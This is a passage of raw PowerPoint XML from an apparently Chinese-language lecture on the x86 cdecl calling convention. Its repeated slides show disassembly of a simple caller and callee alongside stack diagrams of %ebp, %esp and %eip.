            <a:ext cx="463941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函数调用栈的工作方式（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>cdecl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="矩形 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F84F678-4E48-44DC-B906-834794C2195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1" name="Shape 481"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1068000" y="4437733"/>
            <a:ext cx="4712800" cy="225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00000000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0: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   8b 55 08    mov    0x8(%ebp),%edx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6:   8b 45 0c    mov    0xc(%ebp),%eax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9:   01 c2       add    %eax,%edx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b:   8b 45 10    mov    0x10(%ebp),%eax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e:   01 d0       add    %edx,%eax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10:   5d          pop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11:   c3          ret</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="482" name="Shape 482"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1068000" y="1443533"/>
            <a:ext cx="4712800" cy="3121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00000012 &lt;caller&gt;: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12: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13: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15:   83 ec 10        sub    $0x10,%esp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18:   6a 03           push   $0x3</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1a:   6a 02           push   $0x2</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1c:   6a 01           push   $0x1</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1e:   e8 fc ff ff ff  call   1f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23:   83 c4 0c        add    $0xc,%esp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26:   89 45 fc        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1333" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>mov    %eax,-0x4(%ebp)</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29:   83 45 fc 04     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1333" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>addl   $0x4,-0x4(%ebp)</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2d:   8b 45 fc        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1333" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>mov    -0x4(%ebp),%eax</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30:   c9              leave</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31:   c3              ret</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="483" name="Shape 483"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="1980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%ebp in caller's caller</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="484" name="Shape 484"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="2389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buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>ret = callee(1, 2, 3) + 4</a:t>
            </a:r>
            <a:endParaRPr sz="1867" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="485" name="Shape 485"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="2799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486" name="Shape 486"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="32089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487" name="Shape 487"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="36185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488" name="Shape 488"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8655400" y="1485751"/>
            <a:ext cx="1286800" cy="365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Stack</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="489" name="Shape 489"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="4028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490" name="Shape 490"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="4437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491" name="Shape 491"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="4847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492" name="Shape 492"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="52569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493" name="Shape 493"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="56665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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="494" name="Shape 494"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6444800" y="2208367"/>
            <a:ext cx="1501600" cy="365600"/>
            <a:chOff x="3771275" y="1633500"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="495" name="Shape 495"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3771275" y="16335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%ebp</a:t>
              </a:r>
              <a:endParaRPr sz="1333" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="496" name="Shape 496"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="4412675" y="1763700"/>
              <a:ext cx="484800" cy="6900"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525" cap="flat" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="497" name="Shape 497"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-162933" y="3931181"/>
            <a:ext cx="1501600" cy="365600"/>
            <a:chOff x="3510225" y="1324000"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="498" name="Shape 498"/>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%eip</a:t>
              </a:r>
              <a:endParaRPr sz="1333" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="499" name="Shape 499"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="4151625" y="1454200"/>
              <a:ext cx="484800" cy="6900"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525" cap="flat" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="500" name="Shape 500"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5798417" y="3854941"/>
            <a:ext cx="2147980" cy="365600"/>
            <a:chOff x="3286490" y="1640558"/>
            <a:chExt cx="1610985" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="501" name="Shape 501"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3286490" y="1640558"/>
              <a:ext cx="11262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highlight>
                    <a:srgbClr val="FFFFFF"/>
                  </a:highlight>
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:rPr>
                <a:t>%esp</a:t>
              </a:r>
              <a:endParaRPr sz="1333" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="502" name="Shape 502"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="4412675" y="1770756"/>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503" name="Shape 503"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5505033" y="3343251"/>
            <a:ext cx="2349200" cy="3252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333" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>%eax = callee(1, 2, 3)</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="文本框 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79FEEB0B-2ABC-4B7B-86D8-759B21F8357E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1068000" y="823118"/>
            <a:ext cx="463941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函数调用栈的工作方式（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>cdecl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="矩形 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC02F2C6-0FCC-48A4-811B-56B73B4EE3BC}"/>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9" name="Shape 509"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1068000" y="4437733"/>
            <a:ext cx="4712800" cy="225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00000000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0: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   8b 55 08    mov    0x8(%ebp),%edx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6:   8b 45 0c    mov    0xc(%ebp),%eax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9:   01 c2       add    %eax,%edx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b:   8b 45 10    mov    0x10(%ebp),%eax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e:   01 d0       add    %edx,%eax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10:   5d          pop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11:   c3          ret</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="510" name="Shape 510"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1068000" y="1443533"/>
            <a:ext cx="4712800" cy="3121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00000012 &lt;caller&gt;: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12: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13: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15:   83 ec 10        sub    $0x10,%esp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18:   6a 03           push   $0x3</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1a:   6a 02           push   $0x2</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1c:   6a 01           push   $0x1</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1e:   e8 fc ff ff ff  call   1f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23:   83 c4 0c        add    $0xc,%esp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26:   89 45 fc        mov    %eax,-0x4(%ebp)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29:   83 45 fc 04     addl   $0x4,-0x4(%ebp)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2d:   8b 45 fc        mov    -0x4(%ebp),%eax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30:   c9              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1333" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>leave</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31:   c3              ret</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="511" name="Shape 511"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="1980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%ebp in caller's caller</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="512" name="Shape 512"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="2389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buSzPts val="1100"/>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513" name="Shape 513"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="2799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514" name="Shape 514"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="32089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515" name="Shape 515"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="36185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516" name="Shape 516"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8655400" y="1485751"/>
            <a:ext cx="1286800" cy="365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Stack</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="517" name="Shape 517"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="4028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518" name="Shape 518"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="4437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519" name="Shape 519"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="4847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520" name="Shape 520"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="52569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521" name="Shape 521"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="56665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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="522" name="Shape 522"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6013200" y="2208367"/>
            <a:ext cx="1933200" cy="365600"/>
            <a:chOff x="3447575" y="1633500"/>
            <a:chExt cx="1449900" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="523" name="Shape 523"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3447575" y="1633500"/>
              <a:ext cx="9651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b="1" kern="0">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:highlight>
                    <a:srgbClr val="666666"/>
                  </a:highlight>
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:rPr>
                <a:t>%esp</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" sz="1333" kern="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:rPr>
                <a:t>, %ebp</a:t>
              </a:r>
              <a:endParaRPr sz="1333" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="524" name="Shape 524"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="4412675" y="1763700"/>
              <a:ext cx="484800" cy="6900"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525" cap="flat" cmpd="sng">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd type="none" w="med" len="med"/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
          </p:spPr>
        </p:cxnSp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="525" name="Shape 525"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-162933" y="4134381"/>
            <a:ext cx="1501600" cy="365600"/>
            <a:chOff x="3510225" y="1324000"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="526" name="Shape 526"/>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%eip</a:t>
              </a:r>
              <a:endParaRPr sz="1333" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="527" name="Shape 527"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="4151625" y="14542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528" name="Shape 528"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4734467" y="4028133"/>
            <a:ext cx="1785600" cy="4096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333" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>mov   %ebp, $esp</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pop   %ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="529" name="Shape 529"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="528" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3988867" y="4129733"/>
            <a:ext cx="745600" cy="103200"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="530" name="Shape 530"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4734467" y="4134367"/>
            <a:ext cx="100800" cy="2540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 name="文本框 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F14B5702-AF5F-44CB-BDA6-9C3575090808}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1068000" y="823118"/>
            <a:ext cx="463941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函数调用栈的工作方式（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>cdecl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="矩形 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{704D6CB6-A7B8-49E9-82D8-1010D40931C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6" name="Shape 536"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1068000" y="4437733"/>
            <a:ext cx="4712800" cy="225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00000000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0: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   8b 55 08    mov    0x8(%ebp),%edx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6:   8b 45 0c    mov    0xc(%ebp),%eax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9:   01 c2       add    %eax,%edx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b:   8b 45 10    mov    0x10(%ebp),%eax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e:   01 d0       add    %edx,%eax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10:   5d          pop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11:   c3          ret</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="537" name="Shape 537"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1068000" y="1443533"/>
